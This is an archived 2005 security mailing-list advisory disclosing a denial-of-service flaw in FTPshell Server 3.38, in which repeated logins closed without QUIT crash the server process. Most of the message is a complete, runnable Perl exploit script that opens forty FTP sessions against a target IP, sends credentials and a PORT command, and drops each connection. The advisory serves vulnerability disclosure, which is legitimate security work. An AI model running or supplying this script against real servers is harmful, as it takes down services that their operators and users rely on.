lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <80115b69050725195013f3b02a@mail.gmail.com> Date: Tue Jul 26 08:52:57 2005 From: reedarvin at gmail.com (Reed Arvin) Subject: Denial of service vulnerability in FTPshell Server Version 3.38 Summary: Denial of service vulnerability in FTPshell Server Version 3.38 (http://www.ftpshell.com/) Details: Logging into the FTP server successfully and then closing the connection (without using the QUIT command) 39 times will cause the ftpshelld.exe process will die. Vulnerable Versions: FTPshell Server Version 3.38 Patches/Workarounds: The vendor was notified of the issue. A patch will be release shorly. The patch will be made available via the vendor's web site (http://www.ftpshell.com/). Exploits: Run the following PERL script against the server. The corresponding process will die. #===== Start FTPShell_FTPDOS.pl ===== # # Usage: FTPShell_FTPDOS.pl <ip> <user> <pass> # FTPShell_FTPDOS.pl 127.0.0.1 hello moto # # FTPshell Server Version 3.38 # # Download: # http://www.ftpshell.com/ # ################################################ use IO::Socket; use Win32; use strict; my($i) = ""; my($socket) = ""; for ($i = 1; $i <= 40; $i++) { if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP")) { print "Login \#$i\n"; Win32::Sleep(300); print $socket "USER $ARGV[1]\r\n"; Win32::Sleep(100); print $socket "PASS $ARGV[2]\r\n"; Win32::Sleep(100); print $socket "PORT 127,0,0,1,18,12\r\n"; Win32::Sleep(100); close($socket); } else { print "Cannot connect to $ARGV[0]:21\n"; } } #===== Start FTPShell_FTPDOS.pl ===== Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com/) Vulnerability discovered using PeachFuzz (http://reedarvin.thearvins.com/tools.html)
Powered by blists - more mailing lists